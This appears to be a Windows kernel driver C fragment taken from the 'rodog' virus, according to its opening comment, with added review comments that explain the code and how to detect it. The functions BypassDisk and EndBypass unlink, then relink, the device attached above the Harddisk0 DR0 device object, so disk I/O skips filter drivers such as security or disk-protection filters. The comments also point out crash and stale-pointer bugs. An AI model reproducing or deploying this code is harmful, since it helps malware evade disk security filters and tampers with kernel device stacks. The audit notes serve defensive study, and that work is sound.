//感谢QQ上某某兄弟的放出来的rodog病毒无壳无下载者版本~
/*
 * Object-manager name passed to IoGetDeviceObjectPointer() below to reach the
 * device object for Harddisk0 / DR0. A driver resolving this name and then
 * writing to the device object's link fields is a useful audit point for
 * device-stack integrity checks.
 */
#define PCIHDD_DR0DEVICE_NAME L"//Device//Harddisk0//DR0"
/* Device object taken from fileObject->DeviceObject in BypassDisk(). */
PDEVICE_OBJECT HddDr0Device = NULL;
/*
 * Whatever was linked as HddDr0Device->AttachedDevice before BypassDisk()
 * cleared it; EndBypass() writes it back. No synchronization is visible for
 * either global, so concurrent or repeated calls are not handled.
 */
PDEVICE_OBJECT HddAttDevice = NULL;
/*
 * Unlinks the device object attached on top of the Harddisk0 DR0 device object
 * by storing NULL into HddDr0Device->AttachedDevice, keeping the previous
 * pointer in HddAttDevice so EndBypass() can put it back. The stated intent
 * (function name and original comment) is that I/O sent to DR0 afterwards no
 * longer traverses the drivers that were attached above it, i.e. disk filter
 * drivers are bypassed. This is device-stack tampering: it requires kernel-mode
 * execution (a loaded driver) and can be detected by comparing the
 * AttachedDevice chain of disk device objects against the expected filter set,
 * or by monitoring writes to DEVICE_OBJECT link fields from non-PnP code.
 *
 * Review notes (grounded in the lines below):
 *  - ASSERT() is a checked-build-only check; in a free build a failed lookup
 *    leaves fileObject NULL and the following dereference bugchecks.
 *  - ObDereferenceObject() releases the only reference taken here, yet
 *    HddDr0Device is retained and later written by EndBypass() without a
 *    reference of its own — TODO confirm the assumed device lifetime.
 *  - Nothing verifies that the device found via AttachedDevice is a filter;
 *    any upper device, including PnP-required ones, is unlinked.
 */
void BypassDisk()
{
UNICODE_STRING objectName;
PDEVICE_OBJECT hardObject = NULL;
PFILE_OBJECT fileObject = NULL;
NTSTATUS status;
RtlInitUnicodeString(&objectName, PCIHDD_DR0DEVICE_NAME);
status = IoGetDeviceObjectPointer(&objectName, FILE_READ_ATTRIBUTES, &fileObject, &hardObject);
ASSERT(NT_SUCCESS(status)); /* checked builds only; status is otherwise ignored */
HddDr0Device = fileObject->DeviceObject; // note: HddDr0Device->AttachedDevice is hardObject
if(HddDr0Device->AttachedDevice)
{ // save the device attached on DR0, then unlink it; EndBypass restores the link
HddAttDevice = InterlockedExchangePointer((PVOID*)&HddDr0Device->AttachedDevice, NULL);
}
ObDereferenceObject(fileObject); /* reference dropped; HddDr0Device is kept anyway */
}
/*
 * Restores the attachment that BypassDisk() removed by writing the saved
 * HddAttDevice pointer back into HddDr0Device->AttachedDevice. Acts only when
 * both globals were populated. The restore is a plain store, whereas the
 * unlink used InterlockedExchangePointer(); the pair is not otherwise
 * synchronized. If the upper device was detached or its driver unloaded in the
 * meantime, this re-links a stale pointer — TODO confirm.
 */
void EndBypass()
{
if(HddDr0Device && HddAttDevice)
{ // restore the device attached on DR0
HddDr0Device->AttachedDevice = HddAttDevice;
}
}